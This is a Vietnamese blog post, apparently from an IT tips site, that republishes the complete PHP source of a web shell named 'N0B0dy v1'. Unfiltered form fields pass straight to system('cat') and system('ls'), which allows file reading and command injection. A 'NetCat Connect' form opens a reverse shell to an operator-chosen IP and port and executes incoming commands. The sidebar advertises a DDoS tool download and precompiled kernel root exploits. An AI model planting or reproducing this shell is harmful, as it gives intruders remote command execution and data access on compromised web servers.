• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Code » Shell » N0B0dy v1 Shell

N0B0dy v1 Shell

Unknown Labels: Code, Shell Leave A Comment 21:15
Code:
<style type="text/css">
.or3 {
-moz-box-shadow:inset 0px 1px 0px 0px #f29c93;
-webkit-box-shadow:inset 0px 1px 0px 0px #f29c93;
box-shadow:inset 0px 1px 0px 0px #f29c93;
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fe1a00), color-stop(1, #ce0100) );
background:-moz-linear-gradient( center top, #fe1a00 5%, #ce0100 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fe1a00', endColorstr='#ce0100');
background-color:#fe1a00;
display:inline-block;
color:#ffffff;
font-family:arial;
font-size:13px;
font-weight:bold;
padding:2px 4px;
text-decoration:none;
text-shadow:1px 1px 0px #b23e35;
}.or3:hover {
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ce0100), color-stop(1, #fe1a00) );
background:-moz-linear-gradient( center top, #ce0100 5%, #fe1a00 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ce0100', endColorstr='#fe1a00');
background-color:#ce0100;
}.or3:active {
position:relative;
top:1px;
}
.or4 {
-moz-box-shadow:inset 0px 1px 0px 0px #ffffff;
-webkit-box-shadow:inset 0px 1px 0px 0px #ffffff;
box-shadow:inset 0px 1px 0px 0px #ffffff;
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ededed), color-stop(1, #dfdfdf) );
background:-moz-linear-gradient( center top, #ededed 5%, #dfdfdf 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ededed', endColorstr='#dfdfdf');
background-color:#ededed;
display:inline-block;
color:#777777;
font-family:arial;
font-size:13px;
font-weight:bold;
padding:2px 4px;
text-decoration:none;
text-shadow:1px 1px 0px #ffffff;
}.or4:hover {
background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #dfdfdf), color-stop(1, #ededed) );
background:-moz-linear-gradient( center top, #dfdfdf 5%, #ededed 100% );
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#dfdfdf', endColorstr='#ededed');
background-color:#dfdfdf;
}.or4:active {
position:relative;
top:1px;
}

.or2 {
color : #525252;
background-color : #DDDDDD;
width : 510px;
height : 240px;
font-size : 10pt;
}
}
</style>
<html dir=rtl><head><title>uid=99(nobody) gid=99(nobody) groups=99(nobody)</title><meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>
<meta http-equiv='Content-Language' content='ar-ae'><style>body{background: black;color:#f30000}.sub{background:black;border:1px dashed red;color:yellow}</style></head>
<body>
<div align='center'>
<table width=81% style='border:5px solid #808080; background-color:#efefef ' height='100'><tr><td align=center>
<span lang='en-us'>
<font face='Tahoma' size=3 color='#000000'>N0B0dy v1</font><font face='Tahoma' size=3 color=#000000>
</font>
<font face='Tahoma' size=3 color=#000000>
Cod3d |3y Or4nG.M4n</font><font face='Tahoma' size=2 color=#ffffff> </font>
</table>
</div>
<?php
echo '<TABLE border=1 cellSpacing=0 borderColor=# cellPadding=0 width="20%"
bgColor=#444444 align=center #FFFFFF?>
<TBODY>
<TR>
<TD>';
echo '<FONT color=#808080 size=5 face=Terminal>view file</FONT>';
echo '<form action="" method="post">
<input type="submit" class="or3" value="file">
<input type="text" size="71" class="or4" name="file">
</p></form>';
echo '<textarea class="or2" rows=\"10\"name=\"file\" cols=\"61\"> ';
$cat=system("cat {$_POST['file']}");
echo '</textarea></TD><TD>';
echo '<FONT color=#808080 size=5 face=Terminal>view dir</FONT>';
echo '<form action="" method="post">
<input type="text" size="71" class="or4" name="dir">
<input type="submit" class="or3" value="dir"></p></form>';
echo '<textarea class="or2" rows=\"10\"name=\"dir\" cols=\"61\"> ';
$cat=system("ls {$_POST['dir']}");
echo '</textarea></TD></TR></TBODY></TABLE></P></BODY></HTML>';
echo "<TABLE border=1 cellSpacing=0 borderColor=# cellPadding=0 width='90%'
bgColor=#444444 align=center #FFFFFF >
<TBODY>
<TR>
<TD><FONT color=#808080 size=5 face=Terminal>NetCat Connect
</FONT>
<form method='POST' action=''><br>
Your IP & Port:<br>
<input type='submit' class='or3' value='Connect'> <input type='text' name='ip' class='or4' size='24' value=''>
<input type='text' class='or4' name='port' size='5' value='443'><br><br>
</form></TD><TD>XxX</TD></TR></TBODY></TABLE></P></BODY></HTML>";
set_time_limit(0);
$ip =$_POST['ip'];
$portum=$_POST['port'];
if ($ip <> "")
{
$mucx=@fsockopen($ip , $port , $errno, $errstr );
if (!$mucx){
$result = "Error: connect Faild ...";
}
else {

$zamazing0="\n";
fputs ($mucx ,"\n+--------------------+\n\n");
fputs ($mucx ,"\n| -== Welcome ==- |\n\n");
fputs ($mucx ,"\n+--------------------+\n\n");
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
fputs ($mucx);
$one="[$";
$two="]";
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}
?>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • PSD - Người & Ta
    DOWNLOAD PSD
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Doover Premium WordPress Theme 2
    DEMO: http://themeforest.net/item/doover-p...review/2279114 Download: http://www.mediafire.com/?04rc5n7qxl15hmo Pass Unlock: nothing Theme n...
  • [Tutorial] Cross Site Request Forgery Attack
    Cross Site Request Forgery Attack – Less known but dangerous Cross Site Request Forgery ( CSRF or XCRF) is one of the top 10 OWASP website ...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Ddos h.o.i.c.2.1
    Link download: http://www.mediafire.com/?tok0nel4cbygisv Password: juno_okyo Phiên bản mới này của Anonymous 2012. Hiệu quả nhưng chỉ dos 1 ...
  • New Autoroot for kernel update 2012 (private)
    Đây là các exploit kernel từng phiên bản đã biên dịch gcc rồi... chỉ cần download up lên + chmod là chạy. Phòng tránh link die download atta...
  • [PSD] Bình An Mỗi Sớm Mai - Zoy Thủ Thuật Blog
    DEMO DOWNLOAD Like và Share để Zoy Thủ Thuật Blog chia sẻ thêm nhiều PSD ảnh bìa đẹp, chất, mới và lạ hơn nữa nhé.! Bình An Mỗi Sớm Mai - Zo...
  • Kỹ thuật Network Address Translation (NAT)
    Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Doover Premium WordPress Theme 2
    DEMO: http://themeforest.net/item/doover-p...review/2279114 Download: http://www.mediafire.com/?04rc5n7qxl15hmo Pass Unlock: nothing Theme n...
  • [Tutorial] Cross Site Request Forgery Attack
    Cross Site Request Forgery Attack – Less known but dangerous Cross Site Request Forgery ( CSRF or XCRF) is one of the top 10 OWASP website ...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Ddos h.o.i.c.2.1
    Ddos h.o.i.c.2.1
    Link download: http://www.mediafire.com/?tok0nel4cbygisv Password: juno_okyo Phiên bản mới này của Anonymous 2012. Hiệu quả nhưng chỉ dos 1 ...
  • New Autoroot for kernel update 2012 (private)
    Đây là các exploit kernel từng phiên bản đã biên dịch gcc rồi... chỉ cần download up lên + chmod là chạy. Phòng tránh link die download atta...
  • [PSD] Bình An Mỗi Sớm Mai - Zoy Thủ Thuật Blog
    [PSD] Bình An Mỗi Sớm Mai - Zoy Thủ Thuật Blog
    DEMO DOWNLOAD Like và Share để Zoy Thủ Thuật Blog chia sẻ thêm nhiều PSD ảnh bìa đẹp, chất, mới và lạ hơn nữa nhé.! Bình An Mỗi Sớm Mai - Zo...
  • Kỹ thuật Network Address Translation (NAT)
    Hầu hết những người sở hữu một kết nối Internet hiện đại ngày nay đều phải sử dụng đến kỹ thuật NAT (Network Address Translation) . NAT đã...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt